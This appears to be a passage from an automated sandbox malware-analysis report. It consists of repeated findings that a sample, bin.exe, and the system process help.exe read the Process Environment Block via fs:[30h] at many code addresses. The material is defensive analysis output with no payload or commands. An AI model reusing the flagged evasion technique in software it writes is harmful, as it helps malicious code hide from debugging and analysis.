Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CBD380 mov ecx, dword ptr fs:[00000030h] 2_2_00CBD380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C11B8F mov eax, dword ptr fs:[00000030h] 2_2_00C11B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C11B8F mov eax, dword ptr fs:[00000030h] 2_2_00C11B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3B390 mov eax, dword ptr fs:[00000030h] 2_2_00C3B390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32397 mov eax, dword ptr fs:[00000030h] 2_2_00C32397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C18794 mov eax, dword ptr fs:[00000030h] 2_2_00C18794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87794 mov eax, dword ptr fs:[00000030h] 2_2_00C87794
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD5BA5 mov eax, dword ptr fs:[00000030h] 2_2_00CD5BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C34BAD mov eax, dword ptr fs:[00000030h] 2_2_00C34BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0DB40 mov eax, dword ptr fs:[00000030h] 2_2_00C0DB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1EF40 mov eax, dword ptr fs:[00000030h] 2_2_00C1EF40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8B58 mov eax, dword ptr fs:[00000030h] 2_2_00CD8B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0F358 mov eax, dword ptr fs:[00000030h] 2_2_00C0F358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0DB60 mov ecx, dword ptr fs:[00000030h] 2_2_00C0DB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1FF60 mov eax, dword ptr fs:[00000030h] 2_2_00C1FF60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8F6A mov eax, dword ptr fs:[00000030h] 2_2_00CD8F6A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C33B7A mov eax, dword ptr fs:[00000030h] 2_2_00C33B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C33B7A mov eax, dword ptr fs:[00000030h] 2_2_00C33B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD070D mov eax, dword ptr fs:[00000030h] 2_2_00CD070D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD070D mov eax, dword ptr fs:[00000030h] 2_2_00CD070D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A70E mov eax, dword ptr fs:[00000030h] 2_2_00C3A70E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A70E mov eax, dword ptr fs:[00000030h] 2_2_00C3A70E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2F716 mov eax, dword ptr fs:[00000030h] 2_2_00C2F716
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC131B mov eax, dword ptr fs:[00000030h] 2_2_00CC131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9FF10 mov eax, dword ptr fs:[00000030h] 2_2_00C9FF10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9FF10 mov eax, dword ptr fs:[00000030h] 2_2_00C9FF10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C04F2E mov eax, dword ptr fs:[00000030h] 2_2_00C04F2E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C04F2E mov eax, dword ptr fs:[00000030h] 2_2_00C04F2E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3E730 mov eax, dword ptr fs:[00000030h] 2_2_00C3E730
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 9_2_00C9B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8CD6 mov eax, dword ptr fs:[00000030h] 9_2_00CD8CD6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C058EC mov eax, dword ptr fs:[00000030h] 9_2_00C058EC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC14FB mov eax, dword ptr fs:[00000030h] 9_2_00CC14FB
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 9_2_00C86CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09080 mov eax, dword ptr fs:[00000030h] 9_2_00C09080
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83884 mov eax, dword ptr fs:[00000030h] 9_2_00C83884
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83884 mov eax, dword ptr fs:[00000030h] 9_2_00C83884
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1849B mov eax, dword ptr fs:[00000030h] 9_2_00C1849B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C320A0 mov eax, dword ptr fs:[00000030h] 9_2_00C320A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C490AF mov eax, dword ptr fs:[00000030h] 9_2_00C490AF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov ecx, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov eax, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3F0BF mov eax, dword ptr fs:[00000030h] 9_2_00C3F0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A44B mov eax, dword ptr fs:[00000030h] 9_2_00C3A44B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C20050 mov eax, dword ptr fs:[00000030h] 9_2_00C20050
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C20050 mov eax, dword ptr fs:[00000030h] 9_2_00C20050
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9C450 mov eax, dword ptr fs:[00000030h] 9_2_00C9C450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9C450 mov eax, dword ptr fs:[00000030h] 9_2_00C9C450
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2746D mov eax, dword ptr fs:[00000030h] 9_2_00C2746D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD1074 mov eax, dword ptr fs:[00000030h] 9_2_00CD1074
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC2073 mov eax, dword ptr fs:[00000030h] 9_2_00CC2073
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD740D mov eax, dword ptr fs:[00000030h] 9_2_00CD740D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86C0A mov eax, dword ptr fs:[00000030h] 9_2_00C86C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 9_2_00CC1C06
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD4015 mov eax, dword ptr fs:[00000030h] 9_2_00CD4015
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD4015 mov eax, dword ptr fs:[00000030h] 9_2_00CD4015
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C87016 mov eax, dword ptr fs:[00000030h] 9_2_00C87016
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1B02A mov eax, dword ptr fs:[00000030h] 9_2_00C1B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3002D mov eax, dword ptr fs:[00000030h] 9_2_00C3002D
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3BC2C mov eax, dword ptr fs:[00000030h] 9_2_00C3BC2C
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov ecx, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 9_2_00C86DC9
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00C0B1E1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00C0B1E1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00C0B1E1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C941E8 mov eax, dword ptr fs:[00000030h] 9_2_00C941E8
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00C1D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00C1D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 9_2_00CCFDE2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 9_2_00CCFDE2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 9_2_00CCFDE2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 9_2_00CCFDE2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CB8DF1 mov eax, dword ptr fs:[00000030h] 9_2_00CB8DF1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2C182 mov eax, dword ptr fs:[00000030h] 9_2_00C2C182
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 mov eax, dword ptr fs:[00000030h] 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 mov eax, dword ptr fs:[00000030h] 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 mov eax, dword ptr fs:[00000030h] 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32581 mov eax, dword ptr fs:[00000030h] 9_2_00C32581
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3A185 mov eax, dword ptr fs:[00000030h] 9_2_00C3A185
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C02D8A mov eax, dword ptr fs:[00000030h] 9_2_00C02D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32990 mov eax, dword ptr fs:[00000030h] 9_2_00C32990
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3FD9B mov eax, dword ptr fs:[00000030h] 9_2_00C3FD9B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3FD9B mov eax, dword ptr fs:[00000030h] 9_2_00C3FD9B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD05AC mov eax, dword ptr fs:[00000030h] 9_2_00CD05AC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD05AC mov eax, dword ptr fs:[00000030h] 9_2_00CD05AC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C335A1 mov eax, dword ptr fs:[00000030h] 9_2_00C335A1
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C361A0 mov eax, dword ptr fs:[00000030h] 9_2_00C361A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C361A0 mov eax, dword ptr fs:[00000030h] 9_2_00C361A0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C869A6 mov eax, dword ptr fs:[00000030h] 9_2_00C869A6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 9_2_00C31DB5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 9_2_00C31DB5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 9_2_00C31DB5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C851BE mov eax, dword ptr fs:[00000030h] 9_2_00C851BE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C851BE mov eax, dword ptr fs:[00000030h] 9_2_00C851BE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C851BE mov eax, dword ptr fs:[00000030h] 9_2_00C851BE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C851BE mov eax, dword ptr fs:[00000030h] 9_2_00C851BE
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2B944 mov eax, dword ptr fs:[00000030h] 9_2_00C2B944
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2B944 mov eax, dword ptr fs:[00000030h] 9_2_00C2B944
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C43D43 mov eax, dword ptr fs:[00000030h] 9_2_00C43D43
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C83540 mov eax, dword ptr fs:[00000030h] 9_2_00C83540
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C27D50 mov eax, dword ptr fs:[00000030h] 9_2_00C27D50
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0C962 mov eax, dword ptr fs:[00000030h] 9_2_00C0C962
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B171 mov eax, dword ptr fs:[00000030h] 9_2_00C0B171
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0B171 mov eax, dword ptr fs:[00000030h] 9_2_00C0B171
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2C577 mov eax, dword ptr fs:[00000030h] 9_2_00C2C577
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C2C577 mov eax, dword ptr fs:[00000030h] 9_2_00C2C577
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09100 mov eax, dword ptr fs:[00000030h] 9_2_00C09100
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09100 mov eax, dword ptr fs:[00000030h] 9_2_00C09100
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09100 mov eax, dword ptr fs:[00000030h] 9_2_00C09100
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov eax, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov eax, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov eax, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov eax, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C24120 mov ecx, dword ptr fs:[00000030h] 9_2_00C24120
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C0AD30 mov eax, dword ptr fs:[00000030h] 9_2_00C0AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C13D34 mov eax, dword ptr fs:[00000030h] 9_2_00C13D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCE539 mov eax, dword ptr fs:[00000030h] 9_2_00CCE539
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C34D3B mov eax, dword ptr fs:[00000030h] 9_2_00C34D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C34D3B mov eax, dword ptr fs:[00000030h] 9_2_00C34D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C34D3B mov eax, dword ptr fs:[00000030h] 9_2_00C34D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8D34 mov eax, dword ptr fs:[00000030h] 9_2_00CD8D34
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3513A mov eax, dword ptr fs:[00000030h] 9_2_00C3513A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3513A mov eax, dword ptr fs:[00000030h] 9_2_00C3513A
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C8A537 mov eax, dword ptr fs:[00000030h] 9_2_00C8A537
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C48EC7 mov eax, dword ptr fs:[00000030h] 9_2_00C48EC7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32ACB mov eax, dword ptr fs:[00000030h] 9_2_00C32ACB
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CBFEC0 mov eax, dword ptr fs:[00000030h] 9_2_00CBFEC0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C336CC mov eax, dword ptr fs:[00000030h] 9_2_00C336CC
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD8ED6 mov eax, dword ptr fs:[00000030h] 9_2_00CD8ED6
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C316E0 mov ecx, dword ptr fs:[00000030h] 9_2_00C316E0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C176E2 mov eax, dword ptr fs:[00000030h] 9_2_00C176E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C32AE4 mov eax, dword ptr fs:[00000030h] 9_2_00C32AE4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C9FE87 mov eax, dword ptr fs:[00000030h] 9_2_00C9FE87
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3D294 mov eax, dword ptr fs:[00000030h] 9_2_00C3D294
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3D294 mov eax, dword ptr fs:[00000030h] 9_2_00C3D294
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C052A5 mov eax, dword ptr fs:[00000030h] 9_2_00C052A5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 9_2_00CD0EA5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 9_2_00CD0EA5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CD0EA5 mov eax, dword ptr fs:[00000030h] 9_2_00CD0EA5
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C846A7 mov eax, dword ptr fs:[00000030h] 9_2_00C846A7
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00C1AAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C1AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00C1AAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C3FAB0 mov eax, dword ptr fs:[00000030h] 9_2_00C3FAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09240 mov eax, dword ptr fs:[00000030h] 9_2_00C09240
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09240 mov eax, dword ptr fs:[00000030h] 9_2_00C09240
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09240 mov eax, dword ptr fs:[00000030h] 9_2_00C09240
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C09240 mov eax, dword ptr fs:[00000030h] 9_2_00C09240
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C17E41 mov eax, dword ptr fs:[00000030h] 9_2_00C17E41
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00CCAE44 mov eax, dword ptr fs:[00000030h] 9_2_00CCAE44
